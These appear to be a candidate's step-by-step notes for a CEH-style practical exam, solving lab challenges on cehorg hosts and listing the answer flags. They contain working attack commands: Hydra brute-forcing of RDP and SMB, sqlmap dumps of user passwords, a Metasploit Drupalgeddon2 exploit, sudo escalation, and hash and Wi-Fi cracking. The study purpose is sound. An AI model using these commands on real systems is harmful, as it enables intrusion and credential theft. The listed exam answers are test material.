Final Notes 2

23 February 2025 08:37

Here are the steps to solve the questions previously listed, based on the information in the sources:
• Perform an extensive scan of the target network and identify the Product Version of the
Domain Controller.
○ You need to perform a thorough scan of the network to identify the domain controller
and its product version.
• Perform extensive scanning and service enumeration of the target networks and identify the
number of mercury services running in the Server.
○ 7. You need to scan the target network, enumerate the services, and count the Mercury
services running on the server. The source mentions Mercury services running on ports
25, 110, and 143.
• Identify a machine with RDP service enabled in the 10.10.55.0/24 subnet. Crack the RDP
credentials for user Jones and obtain a file hide.cfe containing an encrypted image file.
Decrypt the file and enter the CRC32 value of the image file as the answer.
○ Identify Machines with RDP Enabled: Use Nmap to scan the subnet for machines with
port 3389 open.
○ Crack RDP Credentials: Use Hydra to crack the RDP credentials for the user Jones, using
a password list.
○ Transfer the File: Transfer the file to a Parrot or Windows machine.
○ Calculate CRC32: Upload the image to a CRC32 online tool to get the CRC32 value. An
example of such a tool is provided.
○ 2bb407ea.
• Analyze the image file from one of the employee's mobile devices in the 10.10.55.0/24
subnet and extract the sensitive data hidden in the file and enter the secret code as the
answer.
○ Scan the Subnet: Scan the subnet to identify the mobile device.
○ Connect via ADB: Connect to the device using ADB.
▪ adb connect 10.10.55.X:5555
○ Locate and Pull Image File: Locate the image file on the device and pull it to your
machine.
▪ find /sdcard/ -name "*.jpg" -o -name "*.png"
▪ adb pull /sdcard/Downloads/CEH.jpg ./ceh.jpg
○ Extract Hidden Data with Steghide: Use Steghide to extract the hidden data from the
image file.
▪ steghide extract -sf ceh.jpg
○ Analyze Extracted Data: Analyze the extracted data to find the secret code.
○ F!AgBr^V0.
• Perform a vulnerability scan for the host with IP address 192.168.44.32. What is the CVE
number of the vulnerability with the least severity score?
○ Log in to OpenVAS: Log in to OpenVAS.
○ Create a New Target: Create a new target with the IP address 192.168.44.32.
○ Create a New Task: Create a new task and select the target.
○ Run the Task: Start the scan.
○ View the Report: View the report and sort vulnerabilities by severity.
○ Identify the Least Severe Vulnerability: Note the CVE number.
○ 2020-7068.
• Exploit a remote login and command-line execution application on a Linux target in the
10.10.55.0/24 subnet to access a sensitive file, Netnormal.txt. Enter the content in the file as
the answer.
○ Search for ssh port: Search for the SSH port in the subnet.
○ Login using credentials: Log in using the credentials Marcus:M3rcy@123.
▪ ssh [email protected]
Find the Netnormal.txt: Find the Netnormal.txt.

Exam notes Page 1

 ○ Find the Netnormal.txt: Find the Netnormal.txt.
▪ find / -type f -name Netnormal.txt 2> /dev/null
○ Cat the content: Display the contents and submit the answer.
▪ Cat the content and submit the answer
○ H0m3@l0n3.
• An ex-employee of an organization has stolen a vital account credential and stored it in a file
named restricted.txt. Enter the credential as the answer.
○ Navigate to the Directory: Change to the directory where restricted.txt is located
(Documents folder).
○ Decrypt Using Stegsnow: Use Stegsnow with the password "password" to extract the
hidden credential from restricted.txt.
▪ stegsnow -p password -C restricted.txt output.txt
○ View the Extracted Credential: View the content of output.txt to retrieve the vital
account credential.
○ Decode it: Now the output.txt is base64 encoded, Decode it.
▪ cat output.txt | base64 -d
○ maddy@777.
• Exploit weak credentials used for SMB service on a Windows machine in the 10.10.55.0/24
subnet. Obtain the file, Sniffer.txt hosted on the SMB root, and enter its content as the
answer.
○ Identify SMB Service: Use Nmap to identify machines with SMB service enabled.
▪ nmap -p 139,445 --open -sV 10.10.55.0/24
○ Enumerate SMB Shares: Enumerate SMB shares to find the share hosting Sniffer.txt.
▪ smbclient -L \\10.10.55.X
○ Brute-force SMB Credentials: Brute-force SMB credentials if necessary.
▪ hydra -L user_list.txt -P password_list.txt 10.10.55.X smb
○ Access SMB Share: Access the SMB share using valid credentials.
▪ smbclient \\\\10.10.55.X\\share_name -U user%password123
○ Retrieve and Read Sniffer.txt: Retrieve the Sniffer.txt file and read its content.
▪ get Sniffer.txt
▪ cat Sniffer.txt
○ h@ck3r00t.
• Access the Ubuntu machine in the 10.10.55.0/24 network, perform vertical privilege
escalation to that of a root user, and enter the content of the imroot.txt file as the answer.
○ SSH into the machine: SSH into the machine using the credentials Marcus and M3rcy@
123.
▪ ssh [email protected]
○ Check sudo privileges: Check sudo privileges to see if privilege escalation is possible.
▪ sudo -l
○ Switch to root if possible: Switch to the root user if allowed.
▪ sudo -i
○ Find the imroot.txt file: Find the imroot.txt file.
▪ find / -name "imroot.txt" 2>/dev/null
○ Read the content: Read the content of the imroot.txt file.
▪ cat imroot.txt
○ JH8754@!.
• Check how many files are present in the Scan Folder of a Windows machine in the
10.10.55.0/24 subnet and enter the number of files sniffed by the employee as the answer.
○ Launch the RAT Client and establish a connection to the target machine:
○ Use the File Manager to navigate to the "Scan" folder:
○ Count the number of files in the "Scan" folder:
○ 5.
• Find PT_LOAD 0 of the malware executable file given.
○ Open DIE and load the executable:
○ Switch to ELF Tab:
○ Locate PT_LOAD 0:
Record the Virtual Address and Offset:

Exam notes Page 2

 ○ Record the Virtual Address and Offset:
○ 000c54ec.
• Identify the packets responsible for the DDoS attack and determine the least IPv4 packet
count sent to the victim machine.
○ Open Wireshark and load Evil-traffic.pcapng:
○ Apply the display filter: Filter for the specific IP address.
▪ ip.dst == 172.22.10.10
○ Open IPv4 Conversations:
○ Sort by Packets: Sort conversations by packet count.
○ Identify the least packet count: Look through the sorted list to find the conversation
with the least number of packets sent to 172.22.10.10.
○ 19554.
• Perform an SQL injection attack on cinema.cehorg.com and extract the password of user
Daniel.
○ Run sqlmap: Use sqlmap to perform an SQL injection attack.
▪ sqlmap -u "http://cinema.cehorg.com/search.php?q=test" --
cookie="PHPSESSID=your_session_id" --dump
○ Identify the Database and Tables: List the databases and tables to identify the relevant
ones.
▪ sqlmap -u "http://cinema.cehorg.com/search.php?q=test" --
cookie="PHPSESSID=your_session_id" --dbs
▪ sqlmap -u "http://cinema.cehorg.com/search.php?q=test" --
cookie="PHPSESSID=your_session_id" -D database_name --tables
○ Extract the User Table: Extract the user table and dump the data.
▪ sqlmap -u "http://cinema.cehorg.com/search.php?q=test" --
cookie="PHPSESSID=your_session_id" -D database_name -T users -C
username,password --dump
○ qwertyuiop.
• Explore the web application at www.cehorg.com and enter the flag's value on the page with
page_id=95.
○ Open the URL: Open the specified URL in a web browser.
▪ http://www.cehorg.com/index.php?page_id=95
○ View Page Source: View the page source to find the flag.
○ Search for the Flag: Search for the flag in the page source.
○ B$#98TY.
• Perform vulnerability research and exploit the web application training.cehorg.com,
available at 10.10.55.50. Locate the Flag.txt file and enter its content as the answer.
○ Verify the Target: Verify the target is running a Drupal site.
○ Launch Metasploit: Launch Metasploit Framework.
○ Search for the Drupalgeddon2 Exploit: Search for the Drupalgeddon2 module.
○ Select the Exploit Module: Use the appropriate module from the search results.
▪ use exploit/unix/webapp/drupal_drupalgeddon2
○ Set the Target and Options: Set the RHOST to the target IP and any other necessary
options.
▪ set RHOST 10.10.55.50
▪ set RPORT 80
○ Run the Exploit: Execute the exploit.
▪ run
○ Obtain a Shell: If the exploit is successful, you will get a shell on the target machine.
○ Navigate the File System: Use basic Linux commands to navigate and locate the Flag.txt
file.
▪ find / -name Flag.txt 2>/dev/null
○ Read the Content of Flag.txt: Once you locate the file, read its content.
○ M@d(y535.
• Find the value in the Flag column in one of the DB tables and enter it as the answer after
performing SQL injection attack on a web application, cybersec.cehorg.com, available at
192.168.44.40.

Exam notes Page 3

 192.168.44.40.
○ Launch sqlmap with Crawl, Level, and Risk Parameters:
▪ sqlmap -u "http://192.168.44.40" --crawl=3 --level=5 --risk=3 --dbs
○ Review the Discovered Databases: Identify the relevant database containing the Flag
column.
○ List Tables in the Database:
▪ sqlmap -u "http://192.168.44.40" --crawl=3 --level=5 --risk=3 -D database_name --
tables
○ Dump Data from Relevant Tables:
▪ sqlmap -u "http://192.168.44.40" --crawl=3 --level=5 --risk=3 -D database_name -T
table_name -C Flag --dump
○ Review the Output: Look for the value that matches the required format.
○ (y83r5EC.
• Access the files uploaded through DVWA (http://192.168.44.32:8080/DVWA) and decode
the base64 ciphers to reveal the original message among them. Enter the decrypted
message as the answer.
○ Access DVWA Web Application:
▪ http://192.168.44.32:8080/DVWA/ECweb/Certified/
○ Navigate to the Directory: Navigate to the directory containing the files.
○ Identify Base64 Encoded Files: Look for files within the directory that appear to be
encoded in base64.
○ Decode Base64 Content: Download the base64 encoded file(s) to your local machine
and decode the contents.
▪ cat filename.txt | base64 --decode > decoded.txt
○ H^(ker@EC.
• Analyze the traffic capture from an IoT network, identify the packet with IoT Publish
Message, and enter the topic length as the answer.
○ Access the Packet Capture File:
○ Use Wireshark to Analyze the Capture:
○ Apply Display Filter:
▪ mqtt.msgtype == 3
○ Identify Packet Details: Look through the filtered packets to find an MQTT Publish
Message.
○ Determine the Topic Length: Examine the topic field and determine the topic length.
○ 9.
• Decrypt the hash in the Hash2crack.txt file, access the Veracrypt volume, and find the secret
code in the file named EC_data.txt.
○ Retrieve the Hashed Password: Access the ParrotSecurity machine and retrieve the
hash from Hash2crack.txt.
○ Decrypt the Hashed Password: Use a hash cracking tool to decrypt the hash.
▪ john --format=Raw-MD5 --wordlist=rockyou.txt Hash2crack.txt
○ Mount the VeraCrypt Volume: On "EH Workstation 2" machine, open VeraCrypt and
mount the volume Its_File, providing the decrypted password.
○ Retrieve the Secret Code: Locate and open EC_data.txt within the mounted VeraCrypt
volume.
○ 3C_c0un(!L.
• Crack the wireless encryption and enter the total number of characters present in the Wi-Fi
password.
○ Access the Capture File: Access the ParrotSecurity machine and navigate to the
Documents folder where W!F!_Pcap.cap is located.
○ Analyze the Capture File: Use Aircrack-ng to crack the encryption.
▪ airodump-ng W!F!_Pcap.cap
▪ airodump-ng --bssid BSSID --channel CHANNEL -w outputfile W!F!_Pcap.cap
▪ aircrack-ng -w /path/to/wordlist.txt outputfile-01.cap
○ Determine the Password Length: Note the length of the cracked Wi-Fi password.
○ 9.

Exam notes Page 4